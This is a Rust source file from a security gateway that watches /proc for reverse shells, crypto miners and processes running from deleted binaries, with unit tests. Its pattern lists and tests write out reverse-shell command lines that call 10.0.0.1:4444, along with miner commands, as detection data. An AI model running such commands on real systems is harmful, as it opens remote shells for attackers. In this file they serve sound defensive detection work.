nexus-shield 0.4.1

Adaptive zero-trust security gateway with real-time endpoint protection — SQL firewall, SSRF guard, malware detection, process monitoring, network analysis, rootkit detection
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399

// ============================================================================
// File: endpoint/process_monitor.rs
// Description: Real-time process behavior monitoring via /proc
// Author: Andrew Jewell Sr. - AutomataNexus
// Updated: March 24, 2026
// ============================================================================
//! Process Monitor — detects reverse shells, crypto miners, privilege escalation,
//! and suspicious process behavior by polling /proc.

use super::{DetectionCategory, RecommendedAction, ScanResult, Severity};
use parking_lot::RwLock;
use serde::{Deserialize, Serialize};
use std::collections::HashMap;
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::Arc;
use std::time::Instant;

/// Reverse shell command-line patterns.
const REVERSE_SHELL_PATTERNS: &[&str] = &[
    "bash -i >& /dev/tcp/",
    "bash -i >& /dev/udp/",
    "/bin/sh -i",
    "nc -e /bin/",
    "nc -e /bin/bash",
    "ncat -e /bin/",
    "python -c 'import socket",
    "python3 -c 'import socket",
    "python -c \"import socket",
    "python3 -c \"import socket",
    "perl -e 'use Socket",
    "ruby -rsocket",
    "php -r '$sock=fsockopen",
    "socat exec:",
    "0<&196;exec 196<>/dev/tcp/",
    "exec 5<>/dev/tcp/",
    "import pty;pty.spawn",
    "lua -e \"require('socket\"",
    "openssl s_client -connect",
];

/// Crypto miner command-line patterns.
const MINER_PATTERNS: &[&str] = &[
    "stratum+tcp://",
    "stratum+ssl://",
    "xmrig",
    "minerd",
    "cpuminer",
    "cryptonight",
    "ethminer",
    "nbminer",
    "phoenixminer",
    "t-rex",
    "lolminer",
    "gminer",
    "randomx",
    "kawpow",
    "pool.minergate",
    "pool.minexmr",
    "nicehash",
];

/// Configuration for the process monitor.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ProcessMonitorConfig {
    pub poll_interval_ms: u64,
    pub crypto_cpu_threshold: f64,
    pub crypto_duration_secs: u64,
    pub allowlist_names: Vec<String>,
}

impl Default for ProcessMonitorConfig {
    fn default() -> Self {
        Self {
            poll_interval_ms: 2000,
            crypto_cpu_threshold: 90.0,
            crypto_duration_secs: 60,
            allowlist_names: Vec::new(),
        }
    }
}

/// Tracked state for a process.
struct ProcessInfo {
    pid: u32,
    name: String,
    exe: String,
    cmdline: String,
    ppid: u32,
    cpu_ticks: u64,
    first_seen: Instant,
    high_cpu_since: Option<Instant>,
}

/// Real-time process behavior monitor.
pub struct ProcessMonitor {
    config: ProcessMonitorConfig,
    known_pids: RwLock<HashMap<u32, ProcessInfo>>,
    running: Arc<AtomicBool>,
}

impl ProcessMonitor {
    pub fn new(config: ProcessMonitorConfig) -> Self {
        Self {
            config,
            known_pids: RwLock::new(HashMap::new()),
            running: Arc::new(AtomicBool::new(true)),
        }
    }

    /// Perform a single scan of all processes. Returns detections.
    pub fn scan_once(&self) -> Vec<ScanResult> {
        let mut results = Vec::new();
        let mut current_pids: HashMap<u32, ProcessInfo> = HashMap::new();

        // Read /proc for all PIDs
        let entries = match std::fs::read_dir("/proc") {
            Ok(e) => e,
            Err(_) => return results,
        };

        for entry in entries.flatten() {
            let name = entry.file_name();
            let name_str = name.to_string_lossy();

            // Only numeric directories (PIDs)
            let pid: u32 = match name_str.parse() {
                Ok(p) => p,
                Err(_) => continue,
            };

            // Read process info (graceful — processes can exit at any time)
            let comm = read_proc_file(pid, "comm")
                .unwrap_or_default()
                .trim()
                .to_string();
            let cmdline = read_proc_cmdline(pid).unwrap_or_default();
            let stat = read_proc_file(pid, "stat").unwrap_or_default();
            let exe = std::fs::read_link(format!("/proc/{}/exe", pid))
                .map(|p| p.to_string_lossy().to_string())
                .unwrap_or_default();

            // Parse ppid and cpu ticks from stat
            let (ppid, cpu_ticks) = parse_stat_fields(&stat);

            let info = ProcessInfo {
                pid,
                name: comm.clone(),
                exe: exe.clone(),
                cmdline: cmdline.clone(),
                ppid,
                cpu_ticks,
                first_seen: Instant::now(),
                high_cpu_since: None,
            };

            // Check if this is a NEW process
            let is_new = !self.known_pids.read().contains_key(&pid);

            if is_new && !cmdline.is_empty() {
                // Check for reverse shell patterns
                let cmdline_lower = cmdline.to_lowercase();
                for pattern in REVERSE_SHELL_PATTERNS {
                    if cmdline_lower.contains(&pattern.to_lowercase()) {
                        results.push(ScanResult::new(
                            "process_monitor",
                            format!("pid:{} ({})", pid, comm),
                            Severity::Critical,
                            DetectionCategory::SuspiciousProcess {
                                pid,
                                name: comm.clone(),
                            },
                            format!(
                                "Reverse shell detected — PID {} ({}) cmdline matches pattern: '{}'",
                                pid, comm, pattern
                            ),
                            0.95,
                            RecommendedAction::KillProcess { pid },
                        ));
                        break;
                    }
                }

                // Check for crypto miner patterns
                for pattern in MINER_PATTERNS {
                    if cmdline_lower.contains(&pattern.to_lowercase()) {
                        results.push(ScanResult::new(
                            "process_monitor",
                            format!("pid:{} ({})", pid, comm),
                            Severity::High,
                            DetectionCategory::SuspiciousProcess {
                                pid,
                                name: comm.clone(),
                            },
                            format!(
                                "Crypto miner detected — PID {} ({}) cmdline matches pattern: '{}'",
                                pid, comm, pattern
                            ),
                            0.85,
                            RecommendedAction::KillProcess { pid },
                        ));
                        break;
                    }
                }
            }

            // Check for deleted executable (common after injection)
            if exe.contains("(deleted)") {
                results.push(ScanResult::new(
                    "process_monitor",
                    format!("pid:{} ({})", pid, comm),
                    Severity::Medium,
                    DetectionCategory::SuspiciousProcess {
                        pid,
                        name: comm.clone(),
                    },
                    format!(
                        "Process running from deleted binary — PID {} ({}) exe: {}",
                        pid, comm, exe
                    ),
                    0.7,
                    RecommendedAction::Alert,
                ));
            }

            current_pids.insert(pid, info);
        }

        // Update known PIDs
        *self.known_pids.write() = current_pids;

        results
    }

    /// Start the process monitor in a background task.
    pub fn start(
        self: Arc<Self>,
        detection_tx: tokio::sync::mpsc::UnboundedSender<ScanResult>,
    ) -> tokio::task::JoinHandle<()> {
        let running = Arc::clone(&self.running);
        let interval_ms = self.config.poll_interval_ms;

        tokio::spawn(async move {
            let mut interval =
                tokio::time::interval(std::time::Duration::from_millis(interval_ms));

            while running.load(Ordering::Relaxed) {
                interval.tick().await;
                let results = self.scan_once();
                for result in results {
                    if detection_tx.send(result).is_err() {
                        return;
                    }
                }
            }
        })
    }

    /// Stop the process monitor.
    pub fn stop(&self) {
        self.running.store(false, Ordering::Relaxed);
    }
}

/// Read a /proc/[pid]/[file] as a string.
fn read_proc_file(pid: u32, file: &str) -> Option<String> {
    std::fs::read_to_string(format!("/proc/{}/{}", pid, file)).ok()
}

/// Read /proc/[pid]/cmdline, replacing null bytes with spaces.
fn read_proc_cmdline(pid: u32) -> Option<String> {
    let data = std::fs::read(format!("/proc/{}/cmdline", pid)).ok()?;
    let s: String = data.iter().map(|&b| if b == 0 { ' ' } else { b as char }).collect();
    Some(s.trim().to_string())
}

/// Parse ppid (field 4) and cpu ticks (utime+stime, fields 14+15) from /proc/[pid]/stat.
fn parse_stat_fields(stat: &str) -> (u32, u64) {
    // stat format: "pid (comm) state ppid ..."
    // comm can contain spaces and parens, so find the LAST ")" to skip it
    let close_paren = match stat.rfind(')') {
        Some(i) => i,
        None => return (0, 0),
    };

    let fields_str = &stat[close_paren + 2..]; // skip ") "
    let fields: Vec<&str> = fields_str.split_whitespace().collect();

    // After the closing paren:
    // field 0 = state, field 1 = ppid, ..., field 11 = utime, field 12 = stime
    let ppid = fields.get(1).and_then(|s| s.parse().ok()).unwrap_or(0);
    let utime: u64 = fields.get(11).and_then(|s| s.parse().ok()).unwrap_or(0);
    let stime: u64 = fields.get(12).and_then(|s| s.parse().ok()).unwrap_or(0);

    (ppid, utime + stime)
}

/// Check if a command line matches any reverse shell pattern.
pub fn matches_reverse_shell(cmdline: &str) -> bool {
    let lower = cmdline.to_lowercase();
    REVERSE_SHELL_PATTERNS
        .iter()
        .any(|p| lower.contains(&p.to_lowercase()))
}

/// Check if a command line matches any miner pattern.
pub fn matches_miner(cmdline: &str) -> bool {
    let lower = cmdline.to_lowercase();
    MINER_PATTERNS
        .iter()
        .any(|p| lower.contains(&p.to_lowercase()))
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn reverse_shell_bash_tcp() {
        assert!(matches_reverse_shell("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"));
    }

    #[test]
    fn reverse_shell_nc() {
        assert!(matches_reverse_shell("nc -e /bin/bash 10.0.0.1 4444"));
    }

    #[test]
    fn reverse_shell_python() {
        assert!(matches_reverse_shell(
            "python3 -c 'import socket,subprocess,os;s=socket.socket('"
        ));
    }

    #[test]
    fn reverse_shell_perl() {
        assert!(matches_reverse_shell("perl -e 'use Socket;$i=\"10.0.0.1\"'"));
    }

    #[test]
    fn clean_cmdline_passes() {
        assert!(!matches_reverse_shell("vim /etc/nginx/nginx.conf"));
        assert!(!matches_reverse_shell("cargo build --release"));
        assert!(!matches_reverse_shell("node server.js"));
    }

    #[test]
    fn miner_xmrig() {
        assert!(matches_miner("./xmrig --url stratum+tcp://pool.minexmr.com:4444"));
    }

    #[test]
    fn miner_stratum() {
        assert!(matches_miner("miner --pool stratum+ssl://us-east.stratum.slushpool.com"));
    }

    #[test]
    fn normal_process_not_miner() {
        assert!(!matches_miner("python3 train_model.py --epochs 100"));
        assert!(!matches_miner("gcc -O2 main.c -o main"));
    }

    #[test]
    fn config_defaults() {
        let config = ProcessMonitorConfig::default();
        assert_eq!(config.poll_interval_ms, 2000);
        assert_eq!(config.crypto_cpu_threshold, 90.0);
        assert_eq!(config.crypto_duration_secs, 60);
    }

    #[test]
    fn parse_stat_valid() {
        let stat = "1234 (my process) S 1 1234 1234 0 -1 4194304 500 0 0 0 100 50 0 0 20 0 1 0 100 1000000 100 18446744073709551615 0 0 0 0 0 0 0 0 0";
        let (ppid, ticks) = parse_stat_fields(stat);
        assert_eq!(ppid, 1);
        assert_eq!(ticks, 150); // utime(100) + stime(50)
    }

    #[test]
    fn parse_stat_with_parens_in_name() {
        let stat = "5678 (my (weird) proc) S 42 5678 5678 0 -1 0 0 0 0 0 200 30 0 0 20 0 1 0 0 0 0 0 0 0 0 0 0 0 0";
        let (ppid, ticks) = parse_stat_fields(stat);
        assert_eq!(ppid, 42);
        assert_eq!(ticks, 230); // 200 + 30
    }

    #[test]
    fn deleted_exe_pattern() {
        let exe = "/usr/bin/evil (deleted)";
        assert!(exe.contains("(deleted)"));
    }

    #[test]
    fn scan_once_runs_without_crash() {
        let monitor = ProcessMonitor::new(ProcessMonitorConfig::default());
        let results = monitor.scan_once();
        // Should not crash — results may be empty or have findings
        let _ = results;
    }
}